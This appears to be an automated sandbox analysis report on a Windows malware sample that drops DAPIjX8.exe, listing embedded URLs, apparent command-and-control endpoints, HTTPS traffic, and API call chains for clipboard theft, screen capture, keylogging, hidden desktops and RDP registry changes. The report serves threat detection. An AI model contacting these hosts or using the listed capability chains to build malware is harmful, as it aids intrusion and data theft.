                Source: DAPIjX8.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: pXm5oVO3Go.exeString found in binary or memory: http://sdk.jumpw.com/sdk/AdPodxt
                Source: pXm5oVO3Go.exeString found in binary or memory: http://sdk.jumpw.com/sdk/AdPodxtbgImageCustombtnNumbtn%dXbtn%dYbtn%dImgbtn%dTipbtn%dUrlPrgBgImagePrg
                Source: pXm5oVO3Go.exe, 00000000.00000003.2425129747.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/d.bmp
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/d.bmpWhttp://web.ad87h92j.com/4/t.bmp
                Source: pXm5oVO3Go.exe, 00000000.00000002.2607465446.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmp
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmpE=H
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/long.bmpF
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/t.bmp
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/t.bmpP
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/t.bmpmp
                Source: pXm5oVO3Go.exe, 00000000.00000003.2404109033.000000000086F000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2404040552.000000000086E000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2425205703.000000000086F000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2425129747.000000000086E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/text.bmp
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608575327.0000000000CA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://web.ad87h92j.com/4/text.bmpC:
                Source: libcef.dll.0.drString found in binary or memory: http://www.astro.com/swisseph.
                Source: DAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htm
                Source: pXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htmMain
                Source: DAPIjX8.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: libcef.dll.0.drString found in binary or memory: http://www.gnu.org
                Source: pXm5oVO3Go.exeString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: pXm5oVO3Go.exeString found in binary or memory: http://www.openssl.org/support/faq.html....................
                Source: DAPIjX8.exe, 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleep
                Source: pXm5oVO3Go.exeString found in binary or memory: https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.json
                Source: pXm5oVO3Go.exeString found in binary or memory: https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.json
                Source: pXm5oVO3Go.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                Source: DAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.html
                Source: pXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
                Source: pXm5oVO3Go.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3172/qr_code.do
                Source: pXm5oVO3Go.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_cod
                Source: pXm5oVO3Go.exeString found in binary or memory: https://laosiji.swjoy.com/client/api/3524/qr_code.do
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/-
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/6
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/U
                Source: DAPIjX8.exe, 00000009.00000003.2835899023.0000000001603000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3245993542.00000000015F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettask
                Source: DAPIjX8.exe, 00000009.00000003.2743921387.0000000001603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettask4X
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettaskW
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettaskb
                Source: DAPIjX8.exe, 00000009.00000003.2650399121.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/api.php/common/gettaskson
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/d
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/fmB
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com/it$
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com:443/api.php/common/gettask
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com:443/api.php/common/gettask32=C:
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvc.withoutyou5.com:443/api.php/common/gettaskin
                Source: pXm5oVO3Go.exeString found in binary or memory: https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.com
                Source: DAPIjX8.exe, 00000009.00000002.3244823714.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000A.00000002.2726111306.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000B.00000002.2806197060.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://support.ubi.com/
                Source: DAPIjX8.exe, 00000009.00000002.3244823714.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000A.00000002.2726111306.00000000007F3000.00000002.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000B.00000002.2806197060.00000000007F3000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired
                Source: DAPIjX8.exe, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/
                Source: pXm5oVO3Go.exe, 00000000.00000003.2577049291.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000003.2466007324.0000000010030000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247812700.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000A.00000002.2727092994.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, DAPIjX8.exe, 0000000B.00000002.2807257535.000000006C6DD000.00000002.00000001.01000000.0000000B.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/Timezone
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.21.17.45:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.7.127:443 -> 192.168.2.8:49725 version: TLS 1.2
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C691BA1 GetDeviceCaps,LoadCursorA,SetCursor,_memset,SelectObject,BeginPaint,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SetWindowOrgEx,SetWindowExtEx,SetBkMode,CreateFontA,SelectObject,_sprintf,DeleteObject,SelectObject,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,EndPaint,SetCursor,PostMessageA,_lopen,_llseek,GlobalAlloc,GlobalLock,GlobalLock,_llseek,_hread,_lclose,_sprintf,_sprintf,GlobalUnlock,GlobalUnlock,OpenClipboard,EmptyClipboard,RegisterClipboardFormatA,GlobalLock,SetMetaFileBitsEx,GlobalUnlock,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_6C691BA1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A024 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,9_2_0332A024
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03323DE6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_03323DE6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1002C000 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,9_2_1002C000
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10025B70 SetEvent,GetSystemMetrics,BlockInput,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,GlobalSize,GlobalUnWire,CloseClipboard,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_10025B70
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A024 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,CloseClipboard,9_2_0332A024
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332CB04 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetTopWindow,GetWindow,GetWindow,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,9_2_0332CB04
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03326A54 Sleep,CreateMutexA,GetLastError,CloseHandle,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,Sleep,GetForegroundWindow,GetWindowTextA,lstrlen,GetLocalTime,wsprintfA,GetAsyncKeyState,lstrcat,Sleep,ReleaseMutex,9_2_03326A54

                E-Banking Fraud

                barindex
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: SHGetFolderPathA,lstrcpy,CreateFileA,GetFileSize,ReadFile,_strstr,_strstr,_strstr,lstrcpy,lstrcpy,lstrcpy,CreateProcessA,CloseHandle, firefox.exe9_2_0332B744
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: SHGetFolderPathA,lstrcpy,CreateFileA,GetFileSize,ReadFile,_strstr,_strstr,_strstr,lstrcpy,lstrcpy,lstrcpy,CreateProcessA,CloseHandle, firefox.exe9_2_1002D720

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,9_2_6C6A8C7D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6A8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,10_2_6C6A8C7D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332D124 OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,CloseHandle,9_2_0332D124

                System Summary

                barindex
                Source: 9.2.DAPIjX8.exe.32fec24.2.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 9.2.DAPIjX8.exe.31d9c24.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 9.2.DAPIjX8.exe.31d9c24.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: 9.2.DAPIjX8.exe.32fec24.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding registry key / value combination manipulating RDP / Terminal Services Author: ditekSHen
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: t3d.tmp.0.drZip Entry: encrypted
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03328236 LocalAlloc,OpenSCManagerA,OpenServiceA,GetLastError,QueryServiceStatus,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,9_2_03328236
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033161F4 ExitWindowsEx,9_2_033161F4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100181D0 ExitWindowsEx,9_2_100181D0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_004230A00_2_004230A0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006699170_2_00669917
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0040FBE00_2_0040FBE0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0040FCFC0_2_0040FCFC
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0040F5500_2_0040F550
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00641D870_2_00641D87
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_004066200_2_00406620
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00669EF40_2_00669EF4
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036400310_2_03640031
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036552640_2_03655264
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0364C1440_2_0364C144
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036557B50_2_036557B5
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036476800_2_03647680
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_03654D130_2_03654D13
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_03656DF60_2_03656DF6
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_03646CE50_2_03646CE5
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_10008BDA0_2_10008BDA
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_1000C1400_2_1000C140
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100152600_2_10015260
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_10006CE10_2_10006CE1
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100064E10_2_100064E1
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_10014D0F0_2_10014D0F
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_10016DF20_2_10016DF2
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_1000767C0_2_1000767C
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100157B10_2_100157B1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6758359_2_6C675835
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6311129_2_6C631112
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C639CCA9_2_6C639CCA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B9CC59_2_6C6B9CC5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D1CD19_2_6C6D1CD1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C699D7B9_2_6C699D7B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6ABD489_2_6C6ABD48
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6C6D469_2_6C6C6D46
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C64CD329_2_6C64CD32
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6C1D129_2_6C6C1D12
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C68EDF59_2_6C68EDF5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C67BDD09_2_6C67BDD0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C68DD8F9_2_6C68DD8F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D8E6E9_2_6C6D8E6E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C638E609_2_6C638E60
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A3E4C9_2_6C6A3E4C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A9E129_2_6C6A9E12
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C64AED79_2_6C64AED7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6C7F379_2_6C6C7F37
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C64DF3F9_2_6C64DF3F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C64BFD79_2_6C64BFD7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C64387C9_2_6C64387C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6569739_2_6C656973
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D19339_2_6C6D1933
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B99C69_2_6C6B99C6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6BB9D79_2_6C6BB9D7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6709DA9_2_6C6709DA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B59909_2_6C6B5990
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6BCAA59_2_6C6BCAA5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C63EBF49_2_6C63EBF4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A0BCC9_2_6C6A0BCC
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C647BAA9_2_6C647BAA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C645BBD9_2_6C645BBD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C63B41A9_2_6C63B41A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D248B9_2_6C6D248B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D149E9_2_6C6D149E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6445449_2_6C644544
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6CB5039_2_6C6CB503
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C67B5D79_2_6C67B5D7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6605B39_2_6C6605B3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6AF6C99_2_6C6AF6C9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A86B79_2_6C6A86B7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6786899_2_6C678689
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A46989_2_6C6A4698
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6456989_2_6C645698
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C67D7689_2_6C67D768
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B974B9_2_6C6B974B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6C67F59_2_6C6C67F5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C69B07C9_2_6C69B07C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A20259_2_6C6A2025
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A70039_2_6C6A7003
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C65E0D89_2_6C65E0D8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D20A39_2_6C6D20A3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C63E1C89_2_6C63E1C8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C68A1929_2_6C68A192
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B026A9_2_6C6B026A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6932669_2_6C693266
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6382799_2_6C638279
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6962E89_2_6C6962E8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D42E19_2_6C6D42E1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6C62A69_2_6C6C62A6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6482B29_2_6C6482B2
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6A83689_2_6C6A8368
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6363749_2_6C636374
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C69E35C9_2_6C69E35C
